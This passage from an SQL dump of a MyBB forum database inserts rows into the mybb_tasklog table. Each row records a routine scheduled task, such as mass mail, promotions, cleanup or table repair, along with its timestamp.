'1352189086', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15028', '5', '1352189189', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15029', '1', '1352189211', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15030', '7', '1352189227', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15031', '9', '1352189807', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15032', '5', '1352190300', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15033', '9', '1352190313', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15034', '3', '1352191539', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15035', '9', '1352191696', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15036', '5', '1352191705', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15037', '9', '1352192806', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15038', '3', '1352192992', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15039', '1', '1352192997', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15040', '7', '1352193033', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15041', '5', '1352193747', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15042', '9', '1352193783', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15043', '5', '1352194911', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15044', '9', '1352195109', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15045', '3', '1352195125', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15046', '5', '1352195134', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15047', '9', '1352195745', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15048', '3', '1352196032', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15049', '1', '1352196072', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15050', '7', '1352196078', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15051', '5', '1352197358', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15052', '9', '1352197484', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15053', '5', '1352199006', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15054', '9', '1352199027', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15055', '3', '1352199218', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15056', '9', '1352200828', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15057', '3', '1352200864', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15058', '1', '1352200891', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15059', '7', '1352200931', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15060', '5', '1352200979', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15061', '5', '1352201134', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15062', '9', '1352201146', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15063', '3', '1352203284', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15064', '9', '1352203395', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15065', '5', '1352203450', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15066', '1', '1352203462', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15067', '7', '1352203513', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15068', '5', '1352203553', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15069', '9', '1352205408', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15070', '5', '1352205434', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15071', '3', '1352205438', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15072', '9', '1352205850', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15073', '5', '1352206567', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15074', '9', '1352206593', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15075', '3', '1352206755', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15076', '1', '1352206875', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15077', '7', '1352206879', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15078', '5', '1352207149', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15079', '9', '1352207713', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15080', '5', '1352208314', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15081', '9', '1352209519', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15082', '3', '1352209614', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15083', '5', '1352209628', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15084', '9', '1352211550', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15085', '3', '1352211661', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15086', '1', '1352211694', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15087', '7', '1352211700', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15088', '5', '1352212120', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15089', '9', '1352212188', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15090', '3', '1352213377', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15091', '9', '1352214869', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15092', '5', '1352215185', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15093', '3', '1352215212', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15094', '1', '1352215221', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15095', '7', '1352215225', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15096', '5', '1352215946', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15097', '9', '1352215967', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15098', '3', '1352215983', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15099', '9', '1352216638', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15100', '5', '1352216715', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15101', '9', '1352217861', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15102', '3', '1352218490', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15103', '1', '1352219263', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15104', '7', '1352219290', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15105', '5', '1352220912', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15106', '9', '1352220920', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15107', '3', '1352220957', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15108', '3', '1352221330', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15109', '1', '1352221364', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15110', '7', '1352222268', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15111', '5', '1352222619', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15112', '9', '1352223636', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15113', '5', '1352223664', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15114', '3', '1352224154', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15115', '5', '1352224494', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15116', '9', '1352224521', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15117', '3', '1352225151', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15118', '1', '1352225201', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15119', '7', '1352226146', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15120', '5', '1352226604', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15121', '9', '1352227008', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15122', '3', '1352227020', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15123', '9', '1352227719', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15124', '5', '1352227760', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15125', '9', '1352228269', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15126', '3', '1352228517', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15127', '1', '1352228542', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15128', '7', '1352228567', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15129', '5', '1352228716', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15130', '9', '1352229156', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15131', '5', '1352230235', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15132', '9', '1352230263', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15133', '3', '1352230329', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15134', '9', '1352231846', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15135', '5', '1352233860', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15136', '3', '1352233885', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15137', '1', '1352235869', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15138', '7', '1352235876', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15139', '9', '1352235941', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15140', '5', '1352236019', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15141', '3', '1352236047', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15142', '9', '1352236234', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15143', '5', '1352237491', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15144', '9', '1352237500', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15145', '3', '1352237942', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15146', '9', '1352238969', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15147', '5', '1352239218', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15148', '3', '1352239725', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15149', '1', '1352239748', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15150', '7', '1352240109', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15151', '5', '1352240120', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15152', '9', '1352240128', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15153', '5', '1352241205', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15154', '9', '1352241237', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15155', '3', '1352241690', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15156', '9', '1352241857', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15157', '5', '1352241924', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15158', '9', '1352243115', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15159', '3', '1352243299', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15160', '1', '1352243326', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15161', '7', '1352243343', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15162', '5', '1352243346', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15163', '9', '1352243573', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15164', '5', '1352244343', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15165', '9', '1352244382', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15166', '3', '1352245647', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15167', '9', '1352245657', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15168', '5', '1352245894', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15169', '9', '1352246979', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15170', '3', '1352247710', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15171', '1', '1352248112', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15172', '2', '1352248142', 'The daily cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15173', '7', '1352248149', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15174', '11', '1352248251', 'The delayed moderation task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15175', '5', '1352248262', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15176', '9', '1352248341', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15177', '3', '1352248427', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15178', '9', '1352248824', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15179', '5', '1352249101', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15180', '9', '1352252260', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15181', '3', '1352252322', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15182', '1', '1352252488', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15183', '7', '1352252500', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15184', '5', '1352252514', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15185', '9', '1352253041', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15186', '5', '1352253062', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15187', '9', '1352253395', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15188', '3', '1352253541', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15189', '1', '1352253670', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15190', '7', '1352253676', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15191', '5', '1352253922', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15192', '9', '1352254238', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15193', '5', '1352255115', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15194', '9', '1352255131', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15195', '3', '1352255632', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15196', '9', '1352256336', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15197', '5', '1352256339', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15198', '9', '1352257123', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15199', '3', '1352257174', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15200', '1', '1352257325', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15201', '7', '1352257330', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15202', '5', '1352257503', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15203', '9', '1352257834', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15204', '5', '1352258700', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15205', '9', '1352258708', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15206', '3', '1352259026', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15207', '9', '1352259708', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15208', '5', '1352259901', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15209', '9', '1352260520', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15210', '3', '1352261697', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15211', '1', '1352261874', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15212', '7', '1352261991', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15213', '5', '1352262132', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15214', '9', '1352262359', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15215', '5', '1352262625', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15216', '3', '1352262813', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15217', '9', '1352263698', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15218', '5', '1352263705', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15219', '9', '1352264927', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15220', '3', '1352264932', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15221', '1', '1352264933', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15222', '7', '1352264939', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); 